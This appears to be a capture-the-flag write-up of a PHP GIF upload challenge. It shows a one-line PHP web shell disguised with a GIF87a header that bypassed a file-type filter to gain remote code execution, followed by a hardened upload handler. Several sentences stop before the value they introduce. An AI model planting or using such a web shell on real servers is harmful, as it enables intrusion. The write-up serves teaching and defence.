I made a secure php web app where I can upload all my gifs. Some people on the internet told me to run it in a docker container just to protect it from my personal files, but who cares.
At first, I uploaded a GIF file, which was uploaded successfully. Then I attempted to upload a basic PHP payload and got this error:
From the error we can see that the files are stored at
As the server only permitted GIF files, I modified the payload by adding a GIF header:
GIF87a; <?php system($_GET['cmd']) ?>
And it worked: we got remote code execution. We can now execute commands on the machine.
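The filter trusted the first bytes of the file, which is why a GIF header in front of PHP code passed. A stricter upload handler, as an added example that is not the challenge's code (the form field name `gif`, the storage path and the size limit are assumptions, and PHP's GD extension is required):

```php
<?php
// Added example: hardened GIF upload handler. The storage path, size limit
// and form field name ('gif') are assumptions, not the challenge's values.
declare(strict_types=1);

const UPLOAD_DIR = '/var/app-data/gifs';   // assumed: outside the web root
const MAX_BYTES  = 5 * 1024 * 1024;

function store_gif(array $file): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'] ?? '')) {
        throw new RuntimeException('upload failed');
    }
    if (($file['size'] ?? 0) > MAX_BYTES) {
        throw new RuntimeException('file too large');
    }
    // A signature check only proves the file *starts* like a GIF, which is
    // what the "GIF87a; <?php ..." upload relied on. Decode the whole image:
    // text after a bare header has no valid image data and fails here.
    $img = @imagecreatefromgif($file['tmp_name']);
    if ($img === false) {
        throw new RuntimeException('not a valid GIF');
    }
    // Server-chosen name and extension; the client's filename is never used,
    // so nothing ending in .php can be written.
    $dest = UPLOAD_DIR . '/' . bin2hex(random_bytes(16)) . '.gif';
    // Re-encode from decoded pixels so comment blocks and trailing bytes are
    // dropped. Trade-off: GD keeps only the first frame of an animation.
    if (!imagegif($img, $dest)) {
        throw new RuntimeException('could not store image');
    }
    chmod($dest, 0640);
    return basename($dest);
}

if (PHP_SAPI !== 'cli' && ($_SERVER['REQUEST_METHOD'] ?? '') === 'POST' && isset($_FILES['gif'])) {
    try {
        echo 'stored as ', htmlspecialchars(store_gif($_FILES['gif']));
    } catch (RuntimeException $e) {
        http_response_code(400);
        // Generic message only: no filesystem paths are leaked to the client.
        echo 'rejected: ', htmlspecialchars($e->getMessage());
    }
}
```

Because the files live outside the web root, they are served through a separate read-only script or a location where the web server has PHP execution disabled, so an uploaded file is never interpreted as code.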
We can find the flag at: